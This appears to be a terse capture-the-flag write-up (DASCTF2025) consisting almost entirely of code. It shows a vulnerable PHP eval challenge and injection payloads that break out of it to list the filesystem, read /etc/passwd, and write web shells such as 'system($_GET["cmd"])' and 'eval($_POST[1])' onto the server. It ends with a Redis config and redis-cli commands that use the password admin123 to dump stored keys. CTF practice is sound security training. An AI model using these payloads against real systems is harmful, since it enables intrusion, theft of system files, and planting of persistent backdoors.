DASCTF2025wp

1
2
3
4
5
6
7
8

<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
    echo ':(';
}else{
    eval("#$shell");
}
?>

1

index.php?shell=?><?php $d=new GlobIterator('/*');foreach($d as $f){echo $f->getPathname().'<br>';}?>

1

?shell=?><?php $f=new SplFileObject('/etc/passwd');echo $f->fread($f->getSize());?>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

<?php
function block_if_dangerous_code($input) {
    // 定义正则：匹配函数名，忽略大小写，捕获具体匹配内容
    if (preg_match('/\b(eval|include|include_once|require|require_once)\b/i', $input, $match)) {
        $matched_func = $match[1];  // 捕获到的函数名
        echo "<br />";
        echo "<b>Warning</b>: {$matched_func} has been disabled for security reasons in <b>/var/www/html/index.php(6) : eval()'d code</b> on line <b>1</b><br />";
        exit;
    }
}

// 检查 GET 参数 shell
if (isset($_GET['shell'])) {
    block_if_dangerous_code($_GET['shell']);
}

?>

1

?shell=?><?php $f=new SplFileObject('/tmp/shell.php','w');$f->fwrite('<?php system($_GET["cmd"]); ?>');?>

1
2

maps_path = './maps'
cmd = "echo '<?php eval($_POST[1]);'>/var/www/html/1.php"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

################################## SECURITY ###################################

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
requirepass admin123

1
2

redis-cli -a admin123 KEYS "*" > /tmp/5.txt
redis-cli -a admin123 GET "flag" > /tmp/5.txt